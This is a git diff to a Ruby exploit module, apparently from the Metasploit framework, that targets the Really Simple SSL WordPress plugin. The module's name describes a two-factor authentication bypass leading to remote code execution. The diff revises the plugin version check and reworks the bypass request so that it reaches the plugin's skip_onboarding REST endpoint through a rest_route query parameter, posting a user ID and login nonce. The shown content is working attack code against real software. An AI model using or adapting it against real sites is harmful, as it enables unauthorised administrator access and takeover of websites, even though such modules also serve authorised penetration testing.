diff --git a/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb b/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb index 97e097827edda..bb6cdb918eb1b 100644 --- a/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb +++ b/modules/exploits/multi/http/wp_reallysimplessl_2fa_bypass_rce.rb @@ -85,21 +85,17 @@ def initialize(info = {}) def check return CheckCode::Unknown('The WordPress site does not appear to be online.') unless wordpress_and_online? - print_status("WordPress Version: #{wordpress_version}") if wordpress_version - %w[really-simple-ssl really-simple-ssl-pro really-simple-ssl-pro-multisite].each do |slug| - case check_plugin_version_from_readme(slug, '9.1.2', '9.0.0').code + plugin_check = check_plugin_version_from_readme(slug, '9.1.2', '9.0.0') + case plugin_check.code when 'appears' - print_good("Detected vulnerable plugin slug: #{slug}") return CheckCode::Appears("Plugin #{slug} appears to be vulnerable.") when 'safe' - print_status("Plugin #{slug} is patched or not vulnerable.") - when 'unknown' - print_status("Plugin #{slug} could not be verified or is not installed.") + return CheckCode::Safe("Plugin #{slug} is patched or not vulnerable.") end end - CheckCode::Safe('None of the detected plugins are vulnerable.') + return CheckCode::Unknown('No vulnerable plugins were detected.') end def exploit @@ -122,13 +118,16 @@ def bypass_2fa res = send_request_cgi({ 'method' => 'POST', - 'uri' => normalize_uri(target_uri.path, 'wp-json', 'reallysimplessl', 'v1', 'two_fa', 'skip_onboarding'), + 'uri' => normalize_uri(target_uri.path), 'ctype' => 'application/json', 'data' => { 'user_id' => user_id, 'login_nonce' => login_nonce, 'redirect_to' => '/wp-admin/' - }.to_json + }.to_json, + 'vars_get' => { + 'rest_route' => '/reallysimplessl/v1/two_fa/skip_onboarding' + } }) raise WordPressNotOnline, 'No response from the target' unless res